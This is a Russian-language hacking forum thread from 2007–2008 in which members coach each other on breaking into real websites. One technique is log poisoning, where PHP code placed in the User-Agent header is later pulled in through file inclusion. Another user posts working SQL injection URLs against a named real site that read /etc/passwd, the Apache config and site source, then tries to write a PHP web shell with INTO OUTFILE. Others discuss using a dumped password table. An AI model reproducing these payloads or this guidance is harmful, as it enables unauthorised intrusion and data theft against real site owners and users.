Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    один раз получалось инклудить логи, в основном 3 проблемы
    1) их хер найдёшь
    2) если найдёшь, то скорее всего не будет прав на чтение
    3) если повезёт и буду права, то файл будет размером под 3 гига +))
     
  2. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ту же самую структуру я на десятках сайтах видел)
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    1) Денвер
    2) Денвер
    3) Общажная локалка
     
    1 person likes this.
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ну я какбэ говорил в большинстве случаев =\
     
  5. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    3) в логи надо писать не весь шелл, а только код который будет подгружать код шелла в нужную диру. потом его и инклудить
     
    _________________________
    1 person likes this.
  6. bq1foe

    bq1foe Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    38
    Likes Received:
    8
    Reputations:
    0
    С заливкой файлов облом.Скуль в принцепе тоже безполезна,т.к. пассов там нет, они хранятся хер знает где (где именно записано в конфиг.пхп((
    А про то как в логи записать свой код можно по подробней?
     
  7. bq1foe

    bq1foe Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    38
    Likes Received:
    8
    Reputations:
    0
    Так я видать чего то не допонял) Сам access.log я нашел и успешно заинклудил но так и не понял чем мне он может помочь
     
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Подставляй вместо своего юзер агента пхп код инклудящий шелл. Твой заход на сайт запишется в логи, и потом уже их инклудь. Самый простой вариант - скачай программу Minibrowser, там в настройках в поле для юзер агента впиши пхп код, и сделай несколько заходов с него на сайт.
     
  9. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    257
    Reputations:
    46
    http://www.xakep.ru/magazine/xa/101/086/1.asp
     
  10. bq1foe

    bq1foe Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    38
    Likes Received:
    8
    Reputations:
    0
    Попробывал.Ничего не вышло,поковырялся в логах, там походу агенты не сохраняются вобще.
     
  11. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    помогите развить дальше
    http://www.vodnik.info/article.php?aid=-1'+union+select+1,2,3,4,5,6,7,8,9+/*
    с помощью такого запроса прочитад passwd http://www.vodnik.info/article.php?aid=-1'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9+/*

    конфиг апача - http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/etc/httpd/conf/httpd.conf%27),3,4,5,6,7,8,9+/*
    в нем виртуальные хосты в них дырок найти не смог.

    узнав пути расположения сайтов на серваке попытался прочитать страницу http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/home/vodnik/vodnik-www/login.php%27),3,4,5,6,7,8,9+/*
    судя по исходному коду где то есть инклуды
    include_once("includes.inc.php");
    include_once("login_control.php");
    как найти путь к ним?.. может я не то и нетам ищу?
     
    #3411 frigid20, 3 Oct 2008
    Last edited: 3 Oct 2008
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    frigid20, Это не инклюды, точнее инклюды, как функции, а не как уязвимость)
     
  13. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    я не про то что уязвимость - инклуды а про то можно ли их прочитать.. судя по всему в них валяются данные базы
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    frigid20, а, ну да. Эти файлы лежать в той же папке, что и файл, в котором ты нашел эти инклюды.
     
  15. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    по крайней мере через load_file они не читаются.. есть еще какие то способы?
     
  16. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    frigid20, врятли =\ Щас поковыряю скулю, мож чего интересного найду
     
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ещё вопрос:

    office_ausers

    Встречал кто-нибудь такую ? Перепробывал уже во все формы вбивать оттуда пароли))

    Поля:

    1 : usr_id
    2 : user_id
    3 : usr_lname
    4 : usr_fname
    5 : usr_email
    6 : usr_info
    7 : usr_username
    8 : usr_password
    9 : usr_public
    10 : usr_group
     
    #3417 Велемир, 4 Oct 2008
    Last edited: 4 Oct 2008
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    frigid20,

    :)
     
  19. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2Велемир дык в чем проблема то состоит тебе форму для аута нужно что ли найти ? :) Ну тогда если можно то линк сюда или в ПМ ;)
    2frigid20 у тебя ковычки не экраниються судя по запросу :) Залей через Into outfile шелл и будет тебе счастье )
     
    #3419 MaSTeR GэN, 4 Oct 2008
    Last edited: 4 Oct 2008
  20. frigid20

    frigid20 Member

    Joined:
    19 Jan 2008
    Messages:
    19
    Likes Received:
    6
    Reputations:
    5
    2n0ne, спасибо
    2MaSTeR GэN, на запрос вида http://www.vodnik.info/article.php?aid=-1'+select+'<? php system($cmd) ?>'+from+tbl_users+INTO+OUTFILE+'/home/vodnik/vodnik-www/yarobot.php'/* сайт зависает...
     
Thread Status:
Not open for further replies.